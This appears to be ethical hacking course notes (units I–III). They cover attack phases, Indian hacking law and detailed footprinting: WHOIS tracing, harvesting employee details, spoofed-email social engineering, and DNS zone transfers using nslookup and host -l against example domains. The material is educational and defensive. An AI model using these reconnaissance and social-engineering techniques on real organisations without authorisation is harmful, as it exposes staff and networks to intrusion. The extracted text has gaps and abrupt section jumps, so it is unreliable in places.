Ethical Hacking PDF
Ethical Hacking PDF
ETHICAL HACKING
Unit I
Objective:
The Objective of the Unit is to make the learner to familiarize with the different phases in
Ethical Hacking and also to explain the Various Legal implications of Hacking. The Unit
also aims to provide the details on Law and Punishment for Hacking.
Introduction:
This Unit guides through the various terminologies used for Hacking and it also enables
the learner to comprehend the different phases involved in Hacking. Also it provides the
Coverage on the Overview of the attack and the Legal implications of Hacking and
Punishment for Hacking.
The word 'hacker' denotes a person who enjoys learning the details of computer
systems and stretches their capabilities‖.
The verb 'hacking' denotes the rapid development of new programs or the
reverse engineering of already existing software to make the code better, and
efficient.
The term 'cracker' denotes a person who uses his hacking skills for offensive
purposes.
The term 'ethical hacker' denotes security professionals who apply their hacking
skills for defensive purposes.
Enterprises have started to realize the need to evaluate their system for vulnerabilities
and to address Security gaps. The role of an independent security professional as
examined in this context from an auditor's functionality brings out the need for ethical
hackers. In fact, systems audit does include a security evaluation to check for security
lapses, though in a methodological manner with less scope for innovation or 'thinking
out of the box'.
Security used to be a private matter. Until recently information security was something
that was addressed by a handful of trained professionals. With the advent of e-business
and the highly networked business scenario, security has become everyone's
responsibility. The paradigm shift of technologically enabled crime has now made
security everyone's business. Ethical hackers are professionals who are able to
visualize this and respond to actual potential threats. This not only protects them from
attacks but in the process does a lot of common good. The consequences of a security
breach are so large that this volunteer proactive activity should not only be encouraged
but also rewarded. This does not imply that a self proclaimed ethical hacker is better off
doing his victims a 'favor'.
At present the tactical objective is to stay one step ahead of the crackers. The need of
the hour is to think more strategically for the future. Social behavior, as it relates to
computers and information technology, goes beyond merely adhering to the law since
the law often lags behind technological advance.
The ethical question here is with regard to the physical activity. The physical activity of
ethical hacking is sometimes hard to differentiate from cracking - it is hard to discern
intent and predict future action - the main difference is that while an ethical hacker
identifies vulnerabilities (often using the same scanning tools as a cracker) the ethical
hacker does not exploit the vulnerabilities while a cracker does. Until a social framework
is developed to discern the good from the bad ethical hacking should not be
condemned. Else, in our haste to condemn it, we might fail to exploit the goodness in
talented people, thereby risking elimination of our last thin line of stabilizing defense.
2. Essential terminology
Before exploring the various nuances of Ethical Hacking it is worth to understand
various terminologies in the Hacking World.
2.1. Hacker
The term 'hacker' refers to a person who learn the details of computer systems and
stretches their capabilities
2.2. Cracker
The term 'cracker' refers to a person who uses his hacking skills for offensive purposes
2.7. Hacktivism
'Hacktivism' refers to a kind of electronic civil disobedience in which activists take direct
action by breaking into or protesting with government or corporate computer systems. It
can be considered as a kind of information warfare, and it's on the rise. The hacktivists
consider their obligation to bring an offline issue close to their agenda into the online
world. The apparent increase in hacktivism may be due in part to the growing
importance of the internet as a means of communication. As more people go online,
web sites become high-profile targets.
2.8. Vulnerability
Vulnerability can be defined as existence of a weakness, design, or implementation
error that can lead to an unexpected, undesirable event compromising the security of
the system.
2.9. Exploit
A defined way to breach the security of an IT system through vulnerability.
1.
Reconnaissance
5. Clearing
2. Scanning
track
3. Gaining 4. Maintaining
Access Access
3. 1. Phase 1 – Reconnaissance
Reconnaissance is the preparatory phase where a hacker will collect as much
information as possible about a target. This phase is also where the attacker draws on
competitive intelligence to learn more about the target. The phase may also involve
network scanning either external or internal without authorization.
This may spread over time, as the attacker waits to unearth crucial information. One
aspect that gains prominence here is social engineering. A social engineer is a guy who
usually smooths talk's people into disclosing Sensitive information such as unlisted
phone numbers, passwords. Reconnaissance techniques will also includes dumpster
diving. Dumpster diving is the process of looking through an organization's trash for
deleted or discarded sensitive information.
Attackers can use the Internet to obtain information such as employee contact
information, business partners, technologies in use and other critical business
knowledge. For example, there is a database called Who is database that can give
information about internet addresses, ___domain names, contacts etc. If a potential
attacker obtains the DNS information from the registrar, and is able to access it, he can
obtain useful information such as mapping of ___domain names to IP addresses, mail
servers, host information records etc.
Organization should have appropriate policies to protect usage of its information assets
and also should provide guidelines to users on what is acceptable use. These policies
will definitely increase user awareness and Accountability.
An attacker can get critical network information such as mapping of systems, routers
and firewalls by using simple tools such as traceroute. Alternatively, they can use tools
such as Cheops to add sweeping functionality along with that rendered by traceroute.
Trace route is a network based utility which shows the path over the network between
two systems and lists all the intermediate routers to get to the final destination
Tracert 127.0.0.1
Port scanners can detect listening ports to find information about the different types of
services running on the target machine. The primary defense technique is to remove all
the services that are not required. Filtering can be adopted as a defense mechanism.
However, attackers can still use tools to determine the rules implemented for these
filtering.
Vulnerability scanners are the Scanning software that can detect several known
vulnerabilities on a target network. This gives the attacker the advantage of time
because he has to find just a single means of entry while the systems professional has
to secure several vulnerabilities by applying patches.
3.3. Phase 3 - Gaining Access
This is the most important phase of an attack in. For instance, denial of service attacks
can either exhaust resources or stop services from running on the target system.
Stopping of service can be done by killing processes, using a logic / time bomb or even
reconfiguring and crashing the system. Resources can be exhausted locally by filling up
outgoing communication links etc.
The exploit can occur over a LAN, locally, Internet, offline, as a deception or theft. E.g.:
stack-based buffer overflows, denial of service, session hijacking etc. Another Common
technique is called spoofing, a technique used by attackers to exploit the system by
pretending to be someone else or a different system. They can use this technique to
send a malformed packet containing a bug to the target system and exploit vulnerability.
Packet flooding may be used to remotely stop availability of essential services.
Factors that influence whether a hacker can gain access to a target system include
architecture and configuration of target system, Attacker‘s Skill set and initial level of
access obtained. The most damaging of the denial of service attacks can be a
distributed denial of service attacks, where an attacker uses zombie software distributed
over several machines on the Internet to trigger an orchestrated large scale denial of
services.
The risk involved when an attacker gains access is perceived to be high; as the attacker
can gain access at the operating system level, application level or even the network
level, thereby accessing several systems over the network.
Hackers can use Trojan horses to transfer user names, passwords, even credit card
information stored on the system. They can maintain control over 'their' system for long
time periods by 'hardening' the system against other hackers and sometimes in the
process do render some degree of protection to the system from other attacks. They
can then use their access to steal data, consume CPU cycles, trade sensitive
information or even resort to extortion.
Organizations can use intrusion detection systems or even deploy honeynet to detect
intruders. The latter though is not recommended unless the organization has the
required security professional talent to leverage the concept for protection.
An attacker can use the system as a cover to launch fresh attacks against other
systems or use it as a means to reach another system on the network undetected. Thus
this phase of attack can turn into a new cycle of attack by using reconnaissance
techniques all over again.
There have been instances where the attacker has lurked on the systems even as
systems administrators have changed. The system administration can deploy host
based IDS and antivirus tools that can detect Trojans and other seemingly benign files
and directories.
4. Overview of Attacks
Preparation, conduct and conclusion are the three phases of Security testing. The
Process of Conducting a Security evaluation is based on questionnaire session such as
what the corporate is trying to protect, against whom and at what cost? After discussing
these aspects with the organization, a security plan is prepared which will identify the
systems that are to be tested for vulnerabilities, how the testing would be carried out
and what restrictions may be applied..
Limited vulnerability analysis is a process of identifying the specific entry points to the
organization's information systems over the Internet, as well as the visibility of mission
critical systems and data from a connection on the internal network. On detection, the
potential entry points and mission critical systems are scanned for known vulnerabilities.
The scanning is done using standard connection techniques and not solely based on
vulnerability scanners.
In an attack and penetration testing, discovery scans are conducted to gain as much
information as possible about the target. This process is also similar to the limited
vulnerability analysis but the penetration scans can be performed from both the Internet
and internal network perspective. This approach differs from a limited vulnerability
analysis in that here, the testing is not limited to scanning alone. It goes a step further
and tries to exploit the vulnerabilities. This is said to simulate a real threat to data
security.
Therefore, the ethical hacker must communicate to his client the urgency for corrective
action that can extend even after the evaluation is completed. If the system
administrator delays the evaluation of his system until a few days or weeks before his
computers need to go online again, no ethical hacker can provide a really complete
evaluation or implement the corrections for potentially immense security problems.
Therefore, such aspects must be considered during the preparation phase.
The last phase is the conclusion phase, where the results of the evaluation are
communicated explicitly in a report and the organization appraised of the security
threats, vulnerabilities and recommendations for protection.
5. Identification of Exploit Categories
There are several ways to conduct a security evaluation. An ethical hacker may attempt
to perform an attack over various channels such as:
Section 43 deals with penalties and compensation for damage to computer, computer
system etc. This section is the first major and significant legislative step in India to
combat the issue of hacking and data theft. The IT industry has for long been clamoring
for legislation in India to address the crime of data theft, just like physical theft or larceny
of goods and commodities. This Section addresses the civil offence of theft of data. If
any person without permission of the owner or any other person who is in charge of a
computer, accesses or downloads, copies or extracts any data or introduces any
computer contaminant like virus or damages or disrupts any computer or denies access
to a computer to an authorized user or tampers etc, he shall be liable to pay damages to
the person so affected. Earlier in the ITA -2000 the maximum damages under this head
was Rs.1 Crore, which (the ceiling) was since removed in the IT Amendment Act 2008.
Now after the amendment, data theft of Sec 43 is being referred to in Sec 66 by making this
section more purposeful and the word ‗hacking‘ is not used. The word ‗hacking‘ was earlier
called a crime in this Section and at the same time, courses on ‗ethical hacking‘ were also
taught academically. This led to an anomalous situation of people asking how an illegal
activity be taught academically with a word ‗ethical‘ prefixed to it. This tricky situation was
put an end to, by the ITAA when it re-phrased the Section 66 by mapping it with the civil
liability of Section 43 and removing the word ‗Hacking‘. However the act of hacking is still
certainly an offence as per this Section, though some experts interpret
‗hacking‘ as generally for good purposes (obviously to facilitate naming of the courses
as ethical hacking) and ‗cracking‘ for illegal purposes.
8. Summary
Thus the Unit provided the learner a better explanation on the Concepts and
Terminologies in Ethical Hacking. It helps the learner to gain knowledge on different
phases of hacking that includes Reconnaissance – a phase where the attacker uses
different kinds of tactics to gain extensive information about targets, Scanning – here,
the unit discusses on the different kinds of scanning methodology adopted by the
hacker. IT also deeply covers the Access gaining methodology adopted by the attacker
over the targets and the strategy used by the attacker to maintain the Access over the
target networks and conclusively dealt with the Legal Aspects of Ethical hacking and the
punishments given to an attacker for illegally hacking a network.
References:
Command Line Basics for Ethical Hacking:
http://www.youtube.com/watch?v=WBOoZyfsARM
Questionnaires:
1. What is Ethical Hacking?
Objectives
The Objective of this unit is to make the learner to get familiarize with the essential
terms in Hacking and Various phases of attacks committed by the malicious attacker.
Introduction
The Second Unit of Ethical Hacking introduces to the learner on some essential terms
like Threat, Vulnerability, Attacks, Exploits and also the step by step attacking
methodology handled by a malicious hacker on a successful attack against the
Organization‘s Network.
1. Essential Terms
Before we can move on to the tools and techniques, we shall look at some of the key
definitions. The essence of this section is to adopt a standard terminology through the
courseware.
What does it mean when we say that an exploit has occurred? To understand this we
need to understand what constitutes a threat and vulnerability.
1.1. Threat
A threat is an indication of a potential undesirable event. It refers to a situation in which
human(s) or natural occurrences can cause an undesirable outcome. It has been
variously defined in the current context as:
1.2. Vulnerability
Vulnerability has been variously defined in the current context as:
It is important to note the difference between threat and vulnerability. This is because
inherently, most systems have vulnerabilities of some sort. However, this does not
mean that the systems are too flawed for usability.
The key difference between threat and vulnerability is that not every threat results in an
attack, and not every attack succeeds. Success depends on the degree of vulnerability,
the strength of attacks, and the effectiveness of any counter measures in use. If the
attacks needed to exploit vulnerability are very difficult to carry out, then the vulnerability
may be tolerable.
Logically, the next essential term is 'attack'. What is being attacked here? The
information resource that is being protected and defended against any attacks is usually
referred to as the target of evaluation. It has been defined as an IT system, product, or
component that is identified / subjected as requiring security evaluation.
1.3. Attack
An attack has been defined as an assault on system security that derives from an
intelligent threat, i.e., an intelligent act that is an attempt to evade security services and
violate the security policy of a system.
Note that it has been defined as 'intelligent act' that is a “deliberate attempt”. Attacks
can be broadly classified as active and passive.
Active attacks are those that modify the target system or message, i.e. attacks
that violate the integrity of the system or message are examples of an active
attack. An example in this category is an attack on the availability of a system or
service, a so-called denial-of-service (DoS) attack. Active attacks can affect the
availability, integrity and authenticity of the system.
Passive attacks are those that violate the confidentiality without affecting the
state of the system. An example is the electronic eavesdropping on network
transmissions to release message contents or to gather unprotected passwords.
The key word here is ―confidentiality” and relates to preventing the disclosure
of information to unauthorized persons.
The difference between these categories is that while an 'active attack' attempts to alter
system resources or affect their operation, a 'passive attack' attempts to learn or make
use of information from the system but does not affect system resources.
The figure below shows the relation of these terms and sets the scope for this module.
Target of Evaluation
Vulnerability Attacker
Threats
Attacks can also be categorized as originating from within the organization or external to
it.
How does an attack agent (or attacker) take advantage of the vulnerability of the
system? The act of taking advantage of a system vulnerability is termed an 'exploit'.
2. Elements of Security
Note that it is not implied that total protection is required, as this is not practically
possible considering the evolution of technology and the dynamic environment of the
system. There are several aspects to security in the current context. The owner of a
system should have the confidence that the system will behave according to its
specification. This is termed as assurance. Systems, users, applications need to interact
with each other in a networked environment. Identification or authentication is a means
to ensure security in such a scenario. System administrators or other authority needs to
know who has accessed the system resources when and where for what purpose. An
audit trial or log files can address this aspect of security termed as accountability. Not all
resources are usually available to all users. This can have strategic implications. Having
access controls on predefined parameters can help achieve these security
requirements.
Another security aspect critical at the systems operational level is with regard to
reusability. Objects used by one process may not be reused or manipulated by another
process such that security may be violated. This is also known as availability in security
parlance. Information and processes need to be accurate in order to derive value from
the system resource. Accuracy is a key security element. The two aspects discussed
above constitute for the integrity of the system.
2.1. Reconnaissance
Before the real fun for the hacker begins, three essential steps must be performed.
Reconnaissance, the fine art of gathering information and is about scoping out your
target of interest, understanding everything there is to know about that target and how it
interrelates with everything around it, often without sending a single packet to your
target. And because the direct target of your efforts may be tightly shut down, you will
want to understand your target‘s related or peripheral entities as well.
Let‘s look at how physical theft is carried out. When thieves decide to rob a bank, they
don‘t just walk in and start demanding money. Instead, they take great pains to gather
information about the bank—the armored car routes and delivery times, the security
cameras and alarm triggers, the number of tellers and escape exits, the money vault
access paths and authorized personnel and anything else that will help in a successful
attack.
The same requirement applies to successful cyber attackers. They must harvest a
wealth of information to execute a focused and surgical attack (one that won‘t be readily
caught). As a result, attackers will gather as much information as possible about all
aspects of an organization‘s security posture. In the end and if done properly, hackers end
up with a unique profile which is called ―Footprint‖ of their target‘s Internet, remote
access, intranet/extranet and business partner presence. By following a structured
methodology, attackers can systematically extract information from a multitude of sources
to compile this critical footprint of nearly any organization.
Technology Identifies
Domain names
Intrusion-detection systems
Authentication mechanisms
Domain names
Be sure to investigate other sites beyond the main ―http://www‖ and ―https://www‖
sites as well. Hostnames such as www1, www2, web, web1, test, test1, etc., are all
great places to start in your foot printing adventure. But there are others, many others.
Many organizations have sites to handle remote access to internal resources via a web
browser. Microsoft‘s Outlook Web Access is a very common example. It acts as a proxy
to the internal Microsoft Exchange servers from the Internet. Typical URLs for this
resource are https://owa.example.com or https://outlook.example.com. Similarly,
organizations that make use of mainframes, System/36s or AS/400s may offer remote
access via a web browser via services like Web Connect by Open Connect, which
serves up a Java-based 3270 and 5250 emulator and allows for ―green screen‖
access to mainframes and midrange systems such as AS/400s via the client‘s browser.
Virtual Private Networks (VPN) are very common in most organizations as well, so
looking for sites like http://vpn.example.com, https://vpn.example.com, or
http://www.example.com/vpn will often reveal websites designed to help end users
connect to their companies‘ VPNs. You may find VPN vendor and version details as
well as detailed instructions on how to download and configure the VPN client software.
These sites may even include a phone number to call for assistance if the hacker, that
is, employee has any trouble getting connected.
/*
Even if an organization keeps a close eye on what it posts about itself, its partners are
usually not as security-minded. They often reveal additional details that, when combined
with your other findings, could result in a more sensitive aggregate than your sites
revealed on their own. Additionally, this partner information could be used later in a
direct or indirect attack such as a social engineering attack. Taking the time to check out
all the leads will often pay nice dividends in the end.
Using Google Maps (http://maps.google.com), you can utilize the Street View feature,
which actually provides a ―drive-by‖ series of images so you can familiarize yourself
with the building, its surroundings, the streets, and traffic of the area. All this helpful
information to the average Internet user is a treasure trove of information for the bad
guys.
2.3.3.4. Employees: Phone Numbers, Contact Names, E-mail Addresses, and Personal Details
Attackers can use phone numbers to look up your physical address via sites like
www.yellowpages.com.
They may also use your phone number to help them target their war-dialing ranges, or
to launch social-engineering attacks to gain additional information and/or access.
Contact names and e-mail addresses are particularly useful datum. Most organizations
use some derivative of the employee‘s name for their username and e-mail address (for
example, John Smith‘s username is jsmith, johnsmith, john.smith, john_smith, or smithj,
and his e-mail address is [email protected] or something similar). If we know one of
these items, we can probably figure out the others. Having a username is very useful
later in the methodology when we try to gain access to system resources. All of these
items can be useful in social engineering as well (more on social engineering later).
Other personal details can be readily found on the Internet using any number of sites,
which can give hackers personal details ranging from home phone numbers and
addresses to social security numbers, credit histories, and criminal records, among
other things.
In addition to these personal tidbits gathered, there are some websites that can be
pilfered for information on your current or past employees in order to learn more
information about you and your company‘s weaknesses and flaws. The websites you
should frequent in your foot printing searches include social networking sites
(Facebook.com, Myspace.com, Reunion.com, Classmates.com), professional
networking sites (Linkedin.com), career management sites (Monster.com, naukri.com),
family ancestry sites (Ancestry.com), and even online photo management sites
(Flickr.com, Photobucket.com) can be used against you and your company.
Attackers might use any of this information to assist them in their quests. An attacker
might also be interested in an employee‘s home computer, which probably has some
sort of remote access to the target organization. A keystroke logger on an employee‘s
home machine or laptop may very well give a hacker a free ride to the organization‘s
inner sanctum. Why bang one‘s head against the firewalls, IDS, IPS, etc., when the
hacker can simply impersonate a trusted user?
The human factor comes into play during these events, too. Morale is often low during
times like these, and when morale is low, people may be more interested in updating
their resumes than watching the security logs or applying the latest patch. At best, they
are somewhat distracted. There is usually a great deal of confusion and change during
these times, and most people don‘t want to be perceived as uncooperative or as
inhibiting progress. This provides for increased opportunities for exploitation by a skilled
social engineer.
2.3.3.6. Privacy or Security Policies and Technical Details Indicating the Types of Security
Mechanisms in Place
Any piece of information that provides insight into the target organization‘s privacy or
security policies or technical details regarding hardware and software used to protect
the organization can be useful to an attacker for obvious reasons. Opportunities will
most likely present themselves when this information is acquired.
The core functions of the Internet are managed by a nonprofit organization, the Internet
Corporation for Assigned Names and Numbers (ICANN; http://www.icann.org).
ICANN is a technical coordination body for the Internet. Created in October 1998 by a
broad coalition of the Internet‘s business, technical, academic, and user communities,
ICANN is assuming responsibility for a set of technical functions previously performed
under U.S. government contract by the Internet Assigned Numbers Authority (IANA;
http://www.iana.org) and other groups. (In practice, IANA still handles much of the day-
to-day operations, but these will eventually be transitioned to ICANN.)
Specifically, ICANN coordinates the assignment of the following identifiers that must be
globally unique for the Internet to function:
In addition, ICANN coordinates the stable operation of the Internet‘s root DNS server
system.
While there are many parts to ICANN, three of the sub-organizations are of particular
interest to us at this point:
The ASO reviews and develops recommendations on IP address policy and advises the
ICANN board on these matters. The ASO allocates IP address blocks to various
Regional Internet Registries (RIRs) who manage, distribute, and register public Internet
number resources within their respective regions. These RIRs then allocate IPs to
organizations, Internet service providers (ISPs), or in some cases, National Internet
Registries (NIRs) or Local Internet Registries (LIRs) if particular governments require it
(mostly in communist countries, dictatorships, etc.):
The GNSO reviews and develops recommendations on ___domain-name policy for all
generic top-level domains (gTLDs) and advises the ICANN Board on these matters. It‘s
important to note that the GNSO is not responsible for ___domain-name registration, but
rather is responsible for the generic top-level domains (for example, .com, .net, .edu, .org,
and .info), which can be found at http://www.iana.org/gtld/gtld.htm.
The CCNSO reviews and develops recommendations on ___domain-name policy for all
country-code top-level domains (ccTLDs) and advises the ICANN Board on these
matters. Again, ICANN does not handle ___domain-name registrations. The definitive list of
country-code top-level domains can be found at http://www.iana.org/cctld/cctldwhois.
htm.
With all of this centralized management in place, mining for information should be as
simple as querying a central super-server farm somewhere. While the management is
fairly centralized, the actual data is spread across the globe in numerous WHOIS
servers for technical and political reasons. To further complicate matters, the WHOIS
query syntax, type of permitted queries, available data, and formatting of the results can
vary widely from server to server. Furthermore, many of the registrars are actively
restricting queries to combat spammers, hackers, and resource overload; to top it all off,
information for .mil and .gov have been pulled from public view entirely due to national
security concerns.
The first order of business is to determine which one of the many WHOIS servers
contains the information we‘re after. The general process flows like this: the
authoritative Registry for a given TLD, ―.com‖ in this case, contains information about
which Registrar the target entity registered its ___domain with. Then you query the
appropriate Registrar to find the Registrant details for the particular ___domain name you‘re
after. We refer to these as the ―Three Rs‖ of WHOIS: Registry, Registrar, and
Registrant.
There are many places on the Internet that offer one-stop-shopping for WHOIS
information, but it‘s important to understand how to find the information yourself for
those times that the auto-magic tools don‘t work. Since the WHOIS information is based
on a hierarchy, the best place to start is the top of the tree—ICANN. ICANN (IANA) is
the authoritative registry for all of the TLDs and is a great starting point for all manual
WHOIS queries.
If we surf to http://whois.iana.org, we can search for the authoritative registry for all of
.com. This search shows us that the authoritative registry for .com is Verisign Global
Registry Services at http://www.verisign-grs.com. If we go to that site and click the
Whois link to the right, we get the Verisign Whois Search page where we can search for
keyhole.com and find that keyhole.com is registered through
http://www.markmonitor.com. If we go to that site and search their ―Search Whois‖
field on the right, we can query this registrar‘s WHOIS server via their web interface to
find the registrant details for keyhole.com.
This registrant detail provides physical addresses, phone numbers, names, e-mail
addresses, DNS server names, IPs, and so on. If you follow this process carefully, you
shouldn‘t have too much trouble finding registrant details for any (public) ___domain name
on the planet. Remember, some domains like .gov and .mil may not be accessible to
the public via WHOIS.
Last but not least, there are several GUIs available that will also assist you in your
searches:
SamSpade http://www.samspade.org
SuperScan http://www.foundstone.com
NetScan Tools Pro http://www.nwpsw.com
Once you‘ve homed in on the correct WHOIS server for your target, you may be able to
perform other searches if the registrar allows it. You may be able to find all the domains
that a particular DNS server hosts, for instance, or any ___domain name that contains a
certain string. These types of searches are rapidly being disallowed by most WHOIS
servers, but it is still worth a look to see what the registrar permits. It may be just what
you‘re after.
Let‘s say that while perusing your security logs, you run across an interesting entry with
a source IP of 61.0.0.2. You start by entering this IP into the WHOIS search at
http://www.arin.net, which tells you that this range of IPs is actually managed by APNIC.
You then go to APNIC‘s site at http://www.apnic.net to continue your search. Here you
find out that this IP address is actually managed by the National Internet Backbone of
India.
This process can be followed to trace back any IP address in the world to its owner, or
at least to a point of contact that may be willing to provide the remaining details. As with
anything else, cooperation is almost completely voluntary and will vary as you deal with
different companies and different governments. Always keep in mind that there are
many ways for a hacker to masquerade their true IP. In today‘s cyberworld, it‘s more
likely to be an illegitimate IP address than a real one. So the IP that shows up in your
logs may be what we refer to as a laundered IP address and almost untraceable.
We can also find out IP ranges and BGP autonomous system numbers that an
organization owns by searching the RIR WHOIS servers for the organization‘s literal
name. For example, if we search for ―Google‖ at http://www.arin.net, we see the IP
ranges that Google owns under its name as well as it‘s AS number, AS15169. It might
be useful to explain why finding BGP data would be useful. IP address information is
probably pretty obvious. BGP info is probably not obvious.
The administrative contact is an important piece of information because it may tell you
the name of the person responsible for the Internet connection or firewall. Our query
also returns voice and fax numbers. This information is an enormous help when you‘re
performing a dial-in penetration review. Just fire up the war-dialers in the noted range,
and you‘re off to a good start in identifying potential modem numbers. In addition, an
intruder will often pose as the administrative contact using social engineering on
unsuspecting users in an organization. An attacker will send spoofed e-mail messages
posing as the administrative contact to a gullible user. It is amazing how many users will
change their passwords to whatever you like, as long as it looks like the request is being
sent from a trusted technical support person.
The last piece of information provides us with the authoritative DNS servers, which are
the sources or records for name lookups for that ___domain or IP. The first one listed is the
primary DNS server; subsequent DNS servers will be secondary, tertiary, and so on.
We will need this information for our DNS interrogation, discussed later in this chapter.
Additionally, we can try to use the network range listed as a starting point for our
network query of the ARIN database.
One of the most serious misconfigurations a system administrator can make is allowing
un-trusted Internet users to perform a DNS zone transfer. While this technique has
become almost obsolete, we include it here for three reasons:
A zone transfer allows a secondary master server to update its zone database from the
primary master. This provides for redundancy when running DNS, should the primary
name server become unavailable. Generally, a DNS zone transfer needs to be
performed only by secondary master DNS servers. Many DNS servers, however, are
misconfigured and provide a copy of the zone to anyone who asks. This isn‘t
necessarily bad if the only information provided is related to systems that are connected
to the Internet and have valid hostnames, although it makes it that much easier for
attackers to find potential targets. The real problem occurs when an organization does
not use a public/private DNS mechanism to segregate its external DNS information
(which is public) from its internal, private DNS information. In this case, internal
hostnames and IP addresses are disclosed to the attacker. Providing internal IP
address information to an untrusted user over the Internet is akin to providing a
complete blueprint, or roadmap, of an organization‘s internal network. Let‘s take a look
at several methods we can use to perform zone transfers and the types of information
that can be gleaned. Although many different tools are available to perform zone
transfers, we are going to limit the discussion to several common types.
A simple way to perform a zone transfer is to use the nslookup client that is usually
provided with most UNIX and Windows implementations. We can use nslookup in
interactive mode, as follows:
[bash]$ nslookup
Address: 10.10.20.2
> 192.168.1.1
Server: ns1.example.com
Address: 10.10.20.2
Name: gate.example.com
Address: 192.168.1.1
We first run nslookup in interactive mode. Once started, it will tell us the default name
server that it is using, which is normally the organization‘s DNS server or a DNS server
provided by an ISP. However, our DNS server (10.10.20.2) is not authoritative for our
target ___domain, so it will not have all the DNS records we are looking for. Therefore, we
need to manually tell nslookup which DNS server to query. In our example, we want to
use the primary DNS server for example.com (192.168.1.1).
Next we set the record type to ―any.‖ This will allow us to pull any DNS records
available (man nslookup) for a complete list.
Finally, we use the ls option to list all the associated records for the ___domain. The –d
switch is used to list all records for the ___domain. We append a period (.) to the end to
signify the fully qualified ___domain name—however, you can leave this off most times. In
addition, we redirect our output to the file /tmp/zone_out so that we can manipulate the
output later.
After completing the zone transfer, we can view the file to see whether there is any
interesting information that will allow us to target specific systems. Let‘s review
simulated output for example.com:
acct18 ID IN A 192.168.230.3
ID IN HINFO ―Gateway2000‖ ―WinWKGRPS‖
ID IN MX 0 exampleadmin-smtp
ID IN RP bsmith.rci bsmith.who
ID IN TXT ―Location:Telephone Room‖
ce ID IN CNAME aesop
au ID IN A 192.168.230.4
ID IN HINFO ―Aspect‖ ―MS-DOS‖
ID IN MX 0 andromeda
ID IN RP jcoy.erebus jcoy.who
ID IN TXT ―Location: Library‖
acct21 ID IN A 192.168.230.5
ID IN HINFO ―Gateway2000‖ ―WinWKGRPS‖
ID IN MX 0 exampleadmin-smtp
ID IN RP bsmith.rci bsmith.who
ID IN TXT ―Location:Accounting‖
We won‘t go through each record in detail, but we will point out several important types.
We see that for each entry we have an ―A‖ record that denotes the IP address of the
system name located to the right. In addition, each host has an HINFO record that
identifies the platform or type of operating system running. HINFO records are not
needed, but they provide a wealth of information to attackers. Because we saved the
results of the zone transfer to an output file, we can easily manipulate the results with
UNIX programs such as grep, sed, awk, or perl.
388
We can see that we have 388 potential records that reference the word ―Solaris.‖
Obviously, we have plenty of targets.
Suppose we wanted to find test systems, which happen to be a favorite choice for
attackers. Because they normally don‘t have many security features enabled, often
have easily guessed passwords, and administrators tend not to notice or care who logs
in to them. They‘re a perfect home for any interloper. Thus, we can search for test
systems as follows:
So we have approximately 96 entries in the zone file that contain the word ―test.‖ This
should equate to a fair number of actual test systems. These are just a few simple
examples. Most intruders will slice and dice this data to zero in on specific system types
with known vulnerabilities.
Keep a few points in mind. First, the aforementioned method queries only one
nameserver at a time. This means you would have to perform the same tasks for all
nameservers that are authoritative for the target ___domain. In addition, we queried only
the example.com ___domain. If there were subdomains, we would have to perform the
same type of query for each subdomain (for example, greenhouse.example.com).
Finally, you may receive a message stating that you can‘t list the ___domain or that the
query was refused. This usually indicates that the server has been configured to
disallow zone transfers from unauthorized users. Therefore, you will not be able to
perform a zone transfer from this server. However, if there are multiple DNS servers,
you may be able to find one that will allow zone transfers.
Now that we have shown you the manual method, there are plenty of tools that speed
the process, including host, Sam Spade, axfr, and dig.
The host command comes with many flavors of UNIX. Some simple ways of using host
are as follows:
host -l example.com
and
host -l -v -t any example.com
If you need just the IP addresses to feed into a shell script, you can just cut out the IP
addresses from the host command:
Not all footprinting functions must be performed through UNIX commands. A number of
Windows products, such as Sam Spade, provide the same information.
The UNIX dig command is a favorite with DNS administrators and is often used to
troubleshoot DNS architectures. It too can perform the various DNS interrogations
mentioned in this section. It has too many command-line options to list here; the man
page explains its features in detail.
Traceroute is a diagnostic tool originally written by Van Jacobson that lets you view the
route that an IP packet follows from one host to the next. traceroute uses the ‗Time to
Live‘ (TTL) field in the IP packet to elicit an ICMP TIME_EXCEEDED message from
each router. Each router that handles the packet is required to decrement the TTL field.
Thus, the TTL field effectively becomes a hop counter. We can use the functionality of
traceroute to determine the exact path that our packets are taking. As mentioned
previously, traceroute may allow you to discover the network topology employed by the
target network, in addition to identifying access control devices (such as an application-
based firewall or packet-filtering routers) that may be filtering our traffic.
We can see the path of the packets traveling several hops to the final destination. The
packets go through the various hops without being blocked. We can assume this is a
live host and that the hop before it (10) is the border router for the organization. Hop 10
could be a dedicated application-based firewall, or it could be a simple packet-filtering
device. Generally, once you hit a live system on a network, the system before it is a
device performing routing functions (for example, a router or a firewall).
It is important to note that most flavors of traceroute in UNIX default to sending User
Datagram Protocol (UDP) packets, with the option of using Internet Control Messaging
Protocol (ICMP) packets with the –I switch. In Windows, however, the default behavior
is to use ICMP echo request packets. Therefore, your mileage may vary using each tool
if the site blocks UDP versus ICMP, and vice versa. Another interesting item of
traceroute is the –g option, which allows the user to specify loose source routing.
Therefore, if you believe the target gateway will accept source-routed packets, you
might try to enable this option with the appropriate hop pointers.
It‘s important to note that because the TTL value used in tracerouting is in the IP
header, we are not limited to UDP or ICMP packets. Literally any IP packet could be
sent. This provides for alternate tracerouting techniques to get our probes through
firewalls that are blocking UDP and ICMP packets. Two tools that allow for TCP
tracerouting to specific ports are the aptly named tcptraceroute (http://michael.toren.net
/code/tcptraceroute) and Cain & Abel (http://www.oxid.it). Additional techniques allow
you to determine specific ACLs that are in place for a given access control device.
Firewall protocol scanning is one such technique, as well as using a tool called firewalk.
Summary:
Thus the Unit provides a Wide area of Coverage on Terminologies, and makes the
learner to describe the various attacking methodology adopted during Reconnaissance
Phase. It explained very well on the difference between threat and Vulnerability also it
discussed various technical and non technical way of gathering information on the
target networks. Specifically, the unit provided the special importance on foot printing
mechanism handled by a malicious hacker to gather valuable information about a
System
Reference:
Threat, Vulnerability and Attacks: http://www.youtube.com/watch?v=cnesgEJTx2s
Questionnaires:
Objectives:
The Objective of this unit is to provide an in-depth knowledge on various attack phases
and gaining access to the target system
Introduction:
The Unit primarily covers the pre- attack phase called Scanning which enable the
attacker to gain extensive information about the target network. The Unit takes the
learner to an advanced level of attacks where He/ She gets familiarize with the port
scanning, Vulnerability Scanning and usage of Open Source attack tools and also the
learner gets the clear idea on the functionality of tools and the methodology to gain
access on the target networks.
1. Scanning
If foot printing is the equivalent of casing a place for information, then scanning is
equivalent to knocking on the walls to find all the doors and windows. During foot
printing, we obtained a list of IP network blocks and IP addresses through a wide variety
of techniques including whois and ARIN queries. These techniques provide the security
administrator or then hacker, valuable information about the target network, including
employee names and phone numbers, IP address ranges, DNS servers, and mail
servers.
